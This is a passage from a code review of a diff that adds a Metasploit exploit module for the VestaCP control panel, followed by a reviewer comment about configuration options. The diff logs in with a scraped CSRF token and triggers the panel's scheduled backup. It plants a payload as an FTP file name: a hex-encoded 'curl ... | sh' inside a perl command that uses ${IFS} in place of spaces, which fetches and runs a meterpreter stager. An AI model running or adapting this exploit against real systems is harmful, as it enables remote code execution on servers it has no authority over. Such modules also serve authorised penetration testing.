modules/exploits/linux/http/vestacp_exec.rb

```diff
@@ -0,0 +1,240 @@
+      @cookie = res.get_cookies
+      @csrf_token = res.body.scan(/<input type="hidden" name="token" value="(.*)">/).flatten[0] || ''
+      if @csrf_token.empty?
+        fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
+      end
+    else
+      fail_with(Failure::Unknown, 'Something went wrong.')
+    end
+    print_good('Cookie and CSRF token values successfully retrieved')
+
+    print_status('Authenticating to HTTP Service with given credentials')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login', '/'),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'token'    => @csrf_token,
+        'user'     => username,
+        'password' => password
+      }
+    })
+
+    if res && res.code == 302 && !res.get_cookies.empty?
+      print_good('Successfully authenticated to the HTTP Service')
+      @cookie = res.get_cookies
+    else
+      fail_with(Failure::Unknown, 'Credentials are not valid.')
+    end
+  end
+
+  def is_scheduled_backup_running
+    res = trigger_scheduled_backup
+    #
+    # MORE explaination.
+    #
+    if res && res.code == 302
+      res = trigger_payload
+      if res.body.include?('An existing backup is already running. Please wait for that backup to finish.')
+        return true
+      else
+        print_good('It seems scheduled backup is done ..! Triggerring payload <3')
+        return false
+      end
+    else
+      fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?')
+    end
+    return false
+  end
+
+  def trigger_payload
+    res = send_request_cgi({
+      'method' => 'GET',
+      'cookie' => @cookie,
+      'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'),
+    })
+    if res && res.code == 200
+      res
+    else
+      fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?')
+    end
+  end
+
+  def trigger_scheduled_backup
+    res = send_request_cgi({
+      'method' => 'GET',
+      'cookie' => @cookie,
+      'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'),
+    })
+    if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\//
+      res
+    else
+      fail_with(Failure::Unknown, 'Something went wrong.')
+    end
+  end
+
+  def payload_implant
+    #
+    # Our payload will be placed as a file name on FTP service.
+    # Payload lenght can't be more then 255 and SPACE can't be used because of the
+    # bug in the backend software. Due to these limitations, I used web delivery method.
+    #
+    # When the initial payload executed. It will execute very short perl command, which is going to fetch
+    # actual python meterpreter first stager and execute it.
+    #
+    final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first
+    p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
+
+    # Yet another datastore variable overriding.
```

Comment:
This should be fixable in the library soon. I see no reason we can't put the configuration in `opts` and fall back on the datastore option.